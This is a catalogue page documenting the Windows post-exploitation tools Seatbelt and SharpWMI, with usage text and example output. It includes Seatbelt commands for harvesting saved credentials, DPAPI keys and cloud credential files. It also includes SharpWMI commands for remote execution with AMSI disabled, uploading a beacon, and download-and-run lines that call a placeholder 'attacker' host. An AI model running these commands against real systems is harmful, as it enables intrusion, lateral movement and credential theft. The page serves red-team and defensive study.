Security Slice

Tag: assemblies

seatbelt

Description

Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.

PlatformWindows
Author@harmj0y and @tifkin_ are the primary authors
License3-Clause BSD
URLhttps://github.com/GhostPack/Seatbelt

Usage

                        %&&@@@&&
                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%
                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
#####%######################  %%%..                       @////(((&%%%%%%%################
                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*
                        &%%&&&%%%%%        v1.0.0         ,(((&%%%%%%%%%%%%%%%%%,
                         #%%%%##,
 
 
Available commands (+ means remote usage is supported):
 
    + AMSIProviders          - Providers registered for AMSI
    + AntiVirus              - Registered antivirus (via WMI)
      AppLocker              - AppLocker settings, if installed
      ARPTable               - Lists the current ARP table and adapter information (equivalent to arp -a)
      AuditPolicies          - Enumerates classic and advanced audit policy settings
    + AuditPolicyRegistry    - Audit settings via the registry
    + AutoRuns               - Auto run executables/scripts/programs
      ChromeBookmarks        - Parses any found Chrome bookmark files
      ChromeHistory          - Parses any found Chrome history files
      ChromePresence         - Checks if interesting Google Chrome files exist
      CloudCredentials       - AWS/Google/Azure cloud credential files
      CredEnum               - Enumerates the current user's saved credentials using CredEnumerate()
      CredGuard              - CredentialGuard configuration
      dir                    - Lists files/folders. By default, lists users' downloads, documents, and desktop folders (arguments == [directory] [depth] [regex] [boolIgnoreErrors]
    + DNSCache               - DNS cache entries (via WMI)
    + DotNet                 - DotNet versions
      DpapiMasterKeys        - List DPAPI master keys
      EnvironmentPath        - Current environment %PATH$ folders and SDDL information
      EnvironmentVariables   - Current user environment variables
      ExplicitLogonEvents    - Explicit Logon events (Event ID 4648) from the security event log. Default of 7 days, argument == last X days.
      ExplorerMRUs           - Explorer most recently used files (last 7 days, argument == last X days)
    + ExplorerRunCommands    - Recent Explorer "run" commands
      FileInfo               - Information about a file (version information, timestamps, basic PE info, etc. argument(s) == file path(s)
      FirefoxHistory         - Parses any found FireFox history files
      FirefoxPresence        - Checks if interesting Firefox files exist
    + Hotfixes               - Installed hotfixes (via WMI)
      IdleTime               - Returns the number of seconds since the current user's last input.
      IEFavorites            - Internet Explorer favorites
      IETabs                 - Open Internet Explorer tabs
      IEUrls                 - Internet Explorer typed URLs (last 7 days, argument == last X days)
      InstalledProducts      - Installed products via the registry
      InterestingFiles       - "Interesting" files matching various patterns in the user's folder. Note: takes non-trivial time.
    + InterestingProcesses   - "Interesting" processes - defensive products and admin tools
      InternetSettings       - Internet settings including proxy configs and zones configuration
    + LAPS                   - LAPS settings, if installed
    + LastShutdown           - Returns the DateTime of the last system shutdown (via the registry).
      LocalGPOs              - Local Group Policy settings applied to the machine/local users
    + LocalGroups            - Non-empty local groups, "-full" displays all groups (argument == computername to enumerate)
    + LocalUsers             - Local users, whether they're active/disabled, and pwd last set (argument == computername to enumerate)
      LogonEvents            - Logon events (Event ID 4624) from the security event log. Default of 10 days, argument == last X days.
    + LogonSessions          - Windows logon sessions
    + LSASettings            - LSA settings (including auth packages)
    + MappedDrives           - Users' mapped drives (via WMI)
      MicrosoftUpdates       - All Microsoft updates.
      NamedPipes             - Named pipe names and any readable ACL information.
    + NetworkProfiles        - Windows network profiles
    + NetworkShares          - Network shares exposed by the machine (via WMI)
    + NTLMSettings           - NTLM authentication settings
      OfficeMRUs             - Office most recently used file list (last 7 days)
      OSInfo                 - Basic OS info (i.e. architecture, OS version, etc.)
      OutlookDownloads       - List files downloaded by Outlook
      PoweredOnEvents        - Reboot and sleep schedule based on the System event log EIDs 1, 12, 13, 42, and 6008. Default of 7 days, argument == last X days.
    + PowerShell             - PowerShell versions and security settings
      PowerShellEvents       - PowerShell script block logs (4104) with sensitive data.
      Printers               - Installed Printers (via WMI)
      ProcessCreationEvents  - Process creation logs (4688) with sensitive data.
      Processes              - Running processes with file info company names that don't contain 'Microsoft', "-full" enumerates all processes
    + ProcessOwners          - Running non-session 0 process list with owners. For remote use.
    + PSSessionSettings      - Enumerates PS Session Settings from the registry
    + PuttyHostKeys          - Saved Putty SSH host keys
    + PuttySessions          - Saved Putty configuration (interesting fields) and SSH host keys
      RDCManFiles            - Windows Remote Desktop Connection Manager settings files
    + RDPSavedConnections    - Saved RDP connections stored in the registry
    + RDPSessions            - Current incoming RDP sessions (argument == computername to enumerate)
      RecycleBin             - Items in the Recycle Bin deleted in the last 30 days - only works from a user context!
      reg                    - Registry key values (HKLM\Software by default) argument == [Path] [intDepth] [Regex] [boolIgnoreErrors]
      RPCMappedEndpoints     - Current RPC endpoints mapped
    + SCCM                   - System Center Configuration Manager (SCCM) settings, if applicable
    + ScheduledTasks         - Scheduled tasks (via WMI) that aren't authored by 'Microsoft', "-full" dumps all Scheduled tasks
      SearchIndex            - Query results from the Windows Search Index, default term of 'passsword'. (argument(s) == <search path> <pattern1,pattern2,...>
      SecurityPackages       - Enumerates the security packages currently available using EnumerateSecurityPackagesA()
      Services               - Services with file info company names that don't contain 'Microsoft', "-full" dumps all processes
      SlackDownloads         - Parses any found 'slack-downloads' files
      SlackPresence          - Checks if interesting Slack files exist
      SlackWorkspaces        - Parses any found 'slack-workspaces' files
    + Sysmon                 - Sysmon configuration from the registry
      SysmonEvents           - Sysmon process creation logs (1) with sensitive data.
      TcpConnections         - Current TCP connections and their associated processes and services
      TokenGroups            - The current token's local and domain groups
      TokenPrivileges        - Currently enabled token privileges (e.g. SeDebugPrivilege/etc.)
    + UAC                    - UAC system policies via the registry
      UdpConnections         - Current UDP connections and associated processes and services
      UserRightAssignments   - Configured User Right Assignments (e.g. SeDenyNetworkLogonRight, SeShutdownPrivilege, etc.) argument == computername to enumerate
    + WindowsAutoLogon       - Registry autologon information
      WindowsCredentialFiles - Windows credential DPAPI blobs
    + WindowsDefender        - Windows Defender settings (including exclusion locations)
    + WindowsEventForwarding - Windows Event Forwarding (WEF) settings via the registry
    + WindowsFirewall        - Non-standard firewall rules, "-full" dumps all (arguments == allow/deny/tcp/udp/in/out/domain/private/public)
      WindowsVault           - Credentials saved in the Windows Vault (i.e. logins from Internet Explorer and Edge).
      WMIEventConsumer       - Lists WMI Event Consumers
      WMIEventFilter         - Lists WMI Event Filters
      WMIFilterBinding       - Lists WMI Filter to Consumer Bindings
    + WSUS                   - Windows Server Update Services (WSUS) settings, if applicable
 
 
Seatbelt has the following command groups: All, User, System, Slack, Chrome, Remote, Misc
 
    You can invoke command groups with "Seatbelt.exe <group>"
 
   "Seatbelt.exe -group=all" runs all commands
 
   "Seatbelt.exe -group=user" runs the following commands:
 
        ChromePresence, CloudCredentials, CredEnum, dir, DpapiMasterKeys,
        ExplorerMRUs, ExplorerRunCommands, FirefoxPresence, IdleTime,
        IEFavorites, IETabs, IEUrls, MappedDrives,
        OfficeMRUs, PuttyHostKeys, PuttySessions, RDCManFiles,
        RDPSavedConnections, SlackDownloads, SlackPresence, SlackWorkspaces,
        TokenGroups, WindowsCredentialFiles, WindowsVault
 
   "Seatbelt.exe -group=system" runs the following commands:
 
        AMSIProviders, AntiVirus, AppLocker, ARPTable, AuditPolicies,
        AuditPolicyRegistry, AutoRuns, CredGuard, DNSCache,
        DotNet, EnvironmentPath, EnvironmentVariables, Hotfixes,
        InterestingProcesses, InternetSettings, LAPS, LastShutdown,
        LocalGPOs, LocalGroups, LocalUsers, LogonSessions,
        LSASettings, NamedPipes, NetworkProfiles, NetworkShares,
        NTLMSettings, OSInfo, PoweredOnEvents, PowerShell,
        Printers, Processes, PSSessionSettings, RDPSessions,
        SCCM, Services, Sysmon, TcpConnections,
        TokenPrivileges, UAC, UdpConnections, UserRightAssignments,
        WindowsAutoLogon, WindowsDefender, WindowsEventForwarding, WindowsFirewall,
        WMIEventConsumer, WMIEventFilter, WMIFilterBinding, WSUS
 
 
   "Seatbelt.exe -group=slack" runs the following commands:
 
        SlackDownloads, SlackPresence, SlackWorkspaces
 
   "Seatbelt.exe -group=chrome" runs the following commands:
 
        ChromeBookmarks, ChromeHistory, ChromePresence
 
   "Seatbelt.exe -group=remote" runs the following commands:
 
        AMSIProviders, AntiVirus, DotNet, ExplorerRunCommands, Hotfixes,
        InterestingProcesses, LastShutdown, LogonSessions, LSASettings,
        MappedDrives, NetworkProfiles, NetworkShares, NTLMSettings,
        PowerShell, ProcessOwners, PuttyHostKeys, PuttySessions,
        RDPSavedConnections, RDPSessions, Sysmon, WindowsDefender,
        WindowsEventForwarding, WindowsFirewall
 
   "Seatbelt.exe -group=misc" runs the following commands:
 
        ChromeBookmarks, ChromeHistory, ExplicitLogonEvents, FileInfo, FirefoxHistory,
        InstalledProducts, InterestingFiles, LogonEvents, MicrosoftUpdates,
        OutlookDownloads, PowerShellEvents, ProcessCreationEvents, ProcessOwners,
        RecycleBin, reg, RPCMappedEndpoints, ScheduledTasks,
        SearchIndex, SecurityPackages, SysmonEvents

Examples

 seatbelt -q AntiVirus

This will check for installed AntiVirus.

C:\Tools>seatbelt -q AntiVirus
====== AntiVirus ======
 
  Engine                         : Windows Defender
  ProductEXE                     : windowsdefender://
  ReportingEXE                   : %ProgramFiles%\Windows Defender\MsMpeng.exe
seatbelt -q InstalledProducts

This will query WMI for installed software on the system.

C:\Tools>seatbelt -q InstalledProducts
====== InstalledProducts ======
 
  DisplayName                    : BleachBit 4.4.2.2142
  DisplayVersion                 : 4.4.2.2142
  Publisher                      : BleachBit
  InstallDate                    : 1/13/2022 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Google Chrome
  DisplayVersion                 : 99.0.4844.74
  Publisher                      : Google LLC
  InstallDate                    : 3/15/2022 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Icecast v2.0.0
  DisplayVersion                 :
  Publisher                      :
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Microsoft Edge
  DisplayVersion                 : 99.0.1150.39
  Publisher                      : Microsoft Corporation
  InstallDate                    : 3/14/2022 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Microsoft Edge Update
  DisplayVersion                 : 1.3.155.85
  Publisher                      :
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Npcap
  DisplayVersion                 : 1.10
  Publisher                      : Nmap Project
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Wireshark 3.4.4 64-bit
  DisplayVersion                 : 3.4.4
  Publisher                      : The Wireshark developer community, https://www.wireshark.org
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
  DisplayVersion                 : 12.0.30501.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
...
 DisplayName                    : Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29910
  DisplayVersion                 : 14.28.29910
  Publisher                      : Microsoft Corporation
  InstallDate                    : 4/8/2021 12:00:00 AM
  Architecture                   : x64
 
  DisplayName                    : Java(TM) SE Development Kit 15 (64-bit)
  DisplayVersion                 : 15.0.0.0
  Publisher                      : Oracle Corporation
  InstallDate                    : 9/26/2020 12:00:00 AM
  Architecture                   : x64
seatbelt.exe -q <command> -computername=x.x.x.x -username=<domain>\<user> -password=<password>

This will run a command remotely through RPC.

Blog Posts

SharpWMI

Description

A C# implementation of various WMI functionality.

This implementation is a refurbished and enhanced version of original SharpWMI by @harmj0y that adds some more flexibility for working with malicious VBS scripts, AMSI evasion, file upload purely via WMI and makes it possible to return output from WMI remotely executed commands.

PlatformWindows
AuthorWill Schroeder
License3-Clause BSD
URLhttps://github.com/GhostPack/SharpWMI

Usage

USAGE:
  Local system enumeration:       
    SharpWMI.exe action=query query="select * from win32_service" [namespace=BLAH]
 
  Remote system enumeration:
    SharpWMI.exe action=query [computername=HOST1[,HOST2,...]] query="select * from win32_service" [namespace=BLAH]
 
  Remote system Logged On users enumeration:
    SharpWMI.exe action=loggedon [computername=HOST1[,HOST2,...]]
 
  Remote process creation:
    SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command="C:\\temp\\process.exe [args]" [amsi=disable] [result=true]
 
  Remote VBS execution:
    SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=blah] [amsi=disable] [time-specs]
 
  File upload via WMI:
    SharpWMI.exe action=upload [computername=HOST[,HOST2,...]] source="C:\\source\\file.exe" dest="C:\\temp\\dest-file.exe" [amsi=disable]
 
  Remote firewall enumeration :
    SharpWMI.exe action=firewall computername=HOST1[,HOST2,...]
 
  List processes:
    SharpWMI.exe action=ps [computername=HOST[,HOST2,...]]
 
  Terminate process (first found):
    SharpWMI.exe action=terminate process=PID|name [computername=HOST[,HOST2,...]]
 
  Get environment variables (all if name not given):
    SharpWMI.exe action=getenv [name=VariableName] [computername=HOST[,HOST2,...]]
 
  Set environment variable:
    SharpWMI.exe action=setenv name=VariableName value=VariableValue [computername=HOST[,HOST2,...]]
 
  Delete an environment variable:
    SharpWMI.exe action=delenv name=VariableName [computername=HOST[,HOST2,...]]
 
  Install MSI file:
    SharpWMI.exe action=install [computername=HOST[,HOST2,...]] path="C:\\temp\\installer.msi" [amsi=disable]
 
NOTE:
  - Any remote function also takes an optional "username=DOMAIN\\user" "password=Password123!".
  - If computername is not specified, will target localhost.
 
VBS Script execution:
  The 'executevbs' action was reworked as compared to the original version of SharpWMI.
  Script specification defined in [script-specification] offers following methods to point this tool at target VBS code:
 
  A) Executes OS command via preset VBS code:
    SharpWMI.exe action=executevbs [...] command="notepad.exe"
 
  B) Downloads Powershell commands from URL and execute them from within VBS via Powershell's StdIn:
    SharpWMI.exe action=executevbs [...] url="http://attacker/myscript.ps1"
 
  C) Download a binary file from given URL, store it in specified path and then execute it:
                                         url="SOURCE_URL,TARGET_PATH"
    SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe"
 
  D) Download a binary file from given URL, store it in specified path and then execute arbitrary command:
                                         url="SOURCE_URL,TARGET_PATH"
    SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe" command="%TEMP%\bar.exe -some -parameters"
 
  E) Read VBS script from file and execute it:
    SharpWMI.exe action=executevbs [...] script="myscript.vbs"
 
  F) Execute given VBS script given literally:
    SharpWMI.exe action=executevbs [...] script="CreateObject(\\"WScript.Shell\\").Run(\\"notepad.exe\\")"
 
  G) Base64 decode input string being encoded VBS script and execute it on remote machine:
    SharpWMI.exe action=executevbs [...] scriptb64="Q3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIi[...]"
 
  H) Read contents of given file, base64 decode them and then execute on target machine:
    SharpWMI.exe action=executevbs [...] scriptb64="myscript.vbs.b64"
 
  Finally, 'executevbs' action may have additional [time-specs] defined in seconds - they specify script trigger and wait timeouts:
    SharpWMI.exe action=executevbs [...] trigger=5 timeout=10
 
 
EXAMPLES:
 
  SharpWMI.exe action=query query="select * from win32_process"
 
  SharpWMI.exe action=query query="SELECT * FROM AntiVirusProduct" namespace="root\\SecurityCenter2"
 
  SharpWMI.exe action=loggedon computername=primary.testlab.local
 
  SharpWMI.exe action=query computername=primary.testlab.local query="select * from win32_service"
 
  SharpWMI.exe action=query computername=primary,secondary query="select * from win32_process"
 
  SharpWMI.exe action=exec computername=primary.testlab.local command="powershell.exe -enc ZQBj..."
 
  SharpWMI.exe action=exec computername=primary.testlab.local command="whoami" result=true amsi=disable
 
  SharpWMI.exe action=executevbs computername=primary.testlab.local command="notepad.exe" eventname="MyLittleEvent" amsi=disable
 
  SharpWMI.exe action=executevbs computername=primary.testlab.local username="TESTLAB\\harmj0y" password="Password123!"
 
  SharpWMI.exe action=upload computername=primary.testlab.local source="beacon.exe" dest="C:\\Windows\\temp\\foo.exe" amsi=disable
 
  SharpWMI.exe action=terminate computername=primary.testlab.local process=explorer
 
  SharpWMI.exe action=getenv name=PATH computername=primary.testlab.local
 
  SharpWMI.exe action=setenv name=FOO value="BAR" computername=primary.testlab.local
 
  SharpWMI.exe action=delenv name=FOO computername=primary.testlab.local
 
  SharpWMI.exe action=install computername=primary.testlab.local path="C:\\temp\\installer.msi"

Examples

Blog Posts